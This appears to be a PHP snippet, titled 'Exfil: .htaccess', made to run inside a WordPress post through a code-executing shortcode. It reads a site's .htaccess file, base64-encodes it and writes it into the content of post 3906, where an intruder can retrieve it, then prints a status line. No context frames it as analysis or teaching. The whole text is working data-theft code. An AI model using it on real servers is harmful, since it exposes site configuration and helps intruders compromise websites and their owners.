Exfil: .htaccess
[php]
global $wpdb;
$f=@file_get_contents(‘/var/www/html/business/.htaccess’);
if($f&&strlen($f)>0){
$b=base64_encode($f);
$r=$wpdb->update($wpdb->posts,array(“post_content”=>$b),array(“ID”=>3906));
echo “OK:3906:”.strlen($b);
}else{
echo “FAIL:EMPTY:/var/www/html/business/.htaccess”;
}
[/php]